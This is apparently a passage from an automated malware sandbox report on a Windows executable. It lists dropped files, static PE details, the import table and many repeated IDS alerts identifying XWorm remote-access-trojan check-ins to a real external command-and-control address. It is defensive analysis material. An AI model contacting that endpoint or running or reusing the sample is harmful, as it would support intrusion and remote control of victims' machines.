                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.42180419168936
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:ISvfpi6ceLP/9skLmb0OTPWSPHaJG8nAgeMZMMhA2fX4WABlEnNi0uhiTw:TvloTPW+EZMM6DFyc03w
                                                                                        MD5:02E2B37558902E989FF82AB929756D78
                                                                                        SHA1:9BEBB729B30EB2ECA398DD95B090DE767EFB522B
                                                                                        SHA-256:F4604930EDB479E3E0D026B735860DE286C188FDAA535B64385F3CDABBA609C5
                                                                                        SHA-512:152902644F8EDE1587E48059F07B86F65D2100F2715A5B20B30C670AA452D938D6293A97D1C3FD4F9CC9C3725196E1DC804A958466E7DE2E29BA1FB3A765FC63
                                                                                        Malicious:false
                                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        \Device\ConDrv

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
                                                                                        File Type:ISO-8859 text, with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):575
                                                                                        Entropy (8bit):4.9334594979655515
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:t+3p+t/huLufVaOQsXCzLQ8X+UwkY1v3igBe:Yot/hzltcQy+UwkY1vdBe
                                                                                        MD5:06F0C1EA2D397BB67D08A021BE16E7F2
                                                                                        SHA1:10D0313DC2E61081546E7ECDB15A8B64732092AE
                                                                                        SHA-256:D752DD74ECCC283C93DF541DDCBD236737F14828073D4E4B3CC993BF1C2D3EA6
                                                                                        SHA-512:7402E60109EB87014C707E89289599E60F75812E492256434ECA693CB3B9053CBCC0766E4A2B4C0579B657C046C5B76BE27CE33CFE57B253C5BE21E076A2CBEC
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
                                                                                        Preview:.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Deleting old bootstrapper.....[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).

                                                                                        \Device\Harddisk0\DR0

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\TrojanXD.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3::
                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                        Malicious:false
                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Entropy (8bit):7.2160213107929065
                                                                                        TrID:
                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:8svMXMXNRn.exe
                                                                                        File size:815'440 bytes
                                                                                        MD5:e91f3ec430934cf29cda88d9b730d893
                                                                                        SHA1:6453d1f200f568b7964861c683a4f519431a9468
                                                                                        SHA256:4960838a390adf1ea412850ca14f15ce7c201fa967c0089df97742ee517ed0fe
                                                                                        SHA512:cc6afc8a20943ef7d18aaddde9f9257dbd7d0913aeb5ef66734cd593e580ecddde7a0706e4415c202655536b0665ce81116fd5ed487d3311caa10b33fbb7406b
                                                                                        SSDEEP:12288:wyveQB/fTHIGaPkKEYzURNAwbAg/KyEbx/j76eLaOfqPCm+3KP8ps1uZ:wuDXTIGaPhEYzUzA0kyE1jue+AvUG
                                                                                        TLSH:2505D00EE79928F9E076D578C9538A42E37D7C4953B0478F22E54A3E2F672B0CE29750
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

                                                                                        File Icon

                                                                                        Icon Hash:170105b232472f1f

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x140032ee0
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:2
                                                                                        File Version Major:5
                                                                                        File Version Minor:2
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:2
                                                                                        Import Hash:b1c5b1beabd90d9fdabd1df0779ea832

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        call 00007FB22480FEF8h
                                                                                        dec eax
                                                                                        add esp, 28h
                                                                                        jmp 00007FB22480F88Fh
                                                                                        int3
                                                                                        int3
                                                                                        dec eax
                                                                                        mov eax, esp
                                                                                        dec eax
                                                                                        mov dword ptr [eax+08h], ebx
                                                                                        dec eax
                                                                                        mov dword ptr [eax+10h], ebp
                                                                                        dec eax
                                                                                        mov dword ptr [eax+18h], esi
                                                                                        dec eax
                                                                                        mov dword ptr [eax+20h], edi
                                                                                        inc ecx
                                                                                        push esi
                                                                                        dec eax
                                                                                        sub esp, 20h
                                                                                        dec ebp
                                                                                        mov edx, dword ptr [ecx+38h]
                                                                                        dec eax
                                                                                        mov esi, edx
                                                                                        dec ebp
                                                                                        mov esi, eax
                                                                                        dec eax
                                                                                        mov ebp, ecx
                                                                                        dec ecx
                                                                                        mov edx, ecx
                                                                                        dec eax
                                                                                        mov ecx, esi
                                                                                        dec ecx
                                                                                        mov edi, ecx
                                                                                        inc ecx
                                                                                        mov ebx, dword ptr [edx]
                                                                                        dec eax
                                                                                        shl ebx, 04h
                                                                                        dec ecx
                                                                                        add ebx, edx
                                                                                        dec esp
                                                                                        lea eax, dword ptr [ebx+04h]
                                                                                        call 00007FB22480ED13h
                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                        and al, 66h
                                                                                        neg al
                                                                                        mov eax, 00000001h
                                                                                        sbb edx, edx
                                                                                        neg edx
                                                                                        add edx, eax
                                                                                        test dword ptr [ebx+04h], edx
                                                                                        je 00007FB22480FA23h
                                                                                        dec esp
                                                                                        mov ecx, edi
                                                                                        dec ebp
                                                                                        mov eax, esi
                                                                                        dec eax
                                                                                        mov edx, esi
                                                                                        dec eax
                                                                                        mov ecx, ebp
                                                                                        call 00007FB224811A37h
                                                                                        dec eax
                                                                                        mov ebx, dword ptr [esp+30h]
                                                                                        dec eax
                                                                                        mov ebp, dword ptr [esp+38h]
                                                                                        dec eax
                                                                                        mov esi, dword ptr [esp+40h]
                                                                                        dec eax
                                                                                        mov edi, dword ptr [esp+48h]
                                                                                        dec eax
                                                                                        add esp, 20h
                                                                                        inc ecx
                                                                                        pop esi
                                                                                        ret
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        dec eax
                                                                                        sub esp, 48h
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [esp+20h]
                                                                                        call 00007FB2247FE2A3h
                                                                                        dec eax
                                                                                        lea edx, dword ptr [00025747h]
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [esp+20h]
                                                                                        call 00007FB224810AF2h
                                                                                        int3
                                                                                        jmp 00007FB224816CD4h
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3

                                                                                        Rich Headers

                                                                                        Programming Language:
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x2453c.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x950000x970.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x700000x2453c0x24600e7f44ff025b335397008f85696b09635False0.4562795317869416data6.343111875941374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x950000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        PNG0x706440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                        PNG0x7118c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                        RT_ICON0x727380x7198PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9990027510316368
                                                                                        RT_ICON0x798d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.21535253756062936
                                                                                        RT_ICON0x8a0f80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.3363249881908361
                                                                                        RT_ICON0x8e3200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4050829875518672
                                                                                        RT_ICON0x908c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5145403377110694
                                                                                        RT_ICON0x919700x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7411347517730497
                                                                                        RT_DIALOG0x91dd80x2badata0.5286532951289399
                                                                                        RT_DIALOG0x920940x13adata0.6560509554140127
                                                                                        RT_DIALOG0x921d00xf2data0.71900826446281
                                                                                        RT_DIALOG0x922c40x14adata0.6
                                                                                        RT_DIALOG0x924100x314data0.47588832487309646
                                                                                        RT_DIALOG0x927240x24adata0.6279863481228669
                                                                                        RT_STRING0x929700x1fcdata0.421259842519685
                                                                                        RT_STRING0x92b6c0x246data0.41924398625429554
                                                                                        RT_STRING0x92db40x1a6data0.514218009478673
                                                                                        RT_STRING0x92f5c0xdcdata0.65
                                                                                        RT_STRING0x930380x470data0.3873239436619718
                                                                                        RT_STRING0x934a80x164data0.5056179775280899
                                                                                        RT_STRING0x9360c0x110data0.5772058823529411
                                                                                        RT_STRING0x9371c0x158data0.4563953488372093
                                                                                        RT_STRING0x938740xe8data0.5948275862068966
                                                                                        RT_STRING0x9395c0x1c6data0.5242290748898678
                                                                                        RT_STRING0x93b240x268data0.4837662337662338
                                                                                        RT_GROUP_ICON0x93d8c0x5adata0.7666666666666667
                                                                                        RT_MANIFEST0x93de80x753XML 1.0 document, ASCII text, with CRLF line terminators0.39786666666666665

                                                                                        Imports

                                                                                        DLLImport
                                                                                        KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                                                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                        gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-13T19:10:14.387119+02002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:10:14.834834+02002853191ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:10:15.078852+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.078852+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.188293+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.188293+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.313309+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.313309+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.422440+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.422440+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.532050+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.532050+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.641355+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.641355+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.750972+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.750972+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.860004+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.860004+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.969569+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:15.969569+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.079336+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.079336+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.205022+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.205022+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.316692+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.316692+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.427050+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.427050+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.578175+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.578175+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.695457+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.695457+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.797420+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.797420+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.906878+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:16.906878+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.016201+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.016201+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.128719+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.128719+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.234860+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.234860+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.346314+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.346314+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.453708+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.453708+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.563041+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.563041+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.672353+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.672353+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.781825+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.781825+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.891198+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:17.891198+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.000556+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.000556+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.109958+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.109958+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.219825+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.219825+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.328686+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.328686+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.438264+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.438264+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.466044+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
